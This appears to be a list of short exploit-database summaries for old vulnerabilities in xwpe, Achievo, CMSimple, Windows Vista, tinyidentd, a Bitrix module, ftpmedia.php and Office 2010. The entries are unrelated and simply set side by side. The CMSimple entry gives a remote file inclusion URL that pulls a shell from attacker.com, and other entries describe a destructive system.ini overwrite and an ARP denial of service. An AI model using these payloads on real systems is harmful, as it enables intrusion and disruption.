xwpe v1.5.30a-2.1 and prior versions are prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
When calling htmlConverter.exe with specially crafted payload it will cause buffer overflow executing arbitrary attacker supplied code.
The Achievo 1.1.0(index.php) version is vulnerable to Remote File Include. The vulnerability allows an attacker to include arbitrary remote files, resulting in remote code execution.
An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.
The exploit overwrites the system.ini file, causing the PC to not restart. It is advised to make a copy of the file before running the exploit.
Microsoft Windows Vista (SP0) dumps interfaces when it receives this ARP packet. This DoS is useful for an internet cafe, wireless venue, or legitimate local attack. The victim will need to manually refresh their network interface.
This is an exploit code for a vulnerability in tinyidentd. It allows an attacker to execute remote code on the target system.
Multiple SQL Injection vulnerabilities in mcart.xls Bitrix module can be exploited to execute arbitrary SQL queries, obtain sensitive data, modify information in the database, and gain complete control over the vulnerable website. The vulnerabilities require the attacker to be authorized against the website and have access to the vulnerable module. However, the vulnerabilities can also be exploited via CSRF vector if the web application does not check the origin of received requests. This allows a remote anonymous attacker to create a page with a CSRF exploit, trick the victim into visiting this page, and execute arbitrary SQL queries in the database of the vulnerable website.
This exploit allows remote attackers to include arbitrary files via a specially crafted URL in the _MG_CONF[path_html] parameter in the ftpmedia.php script.
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object.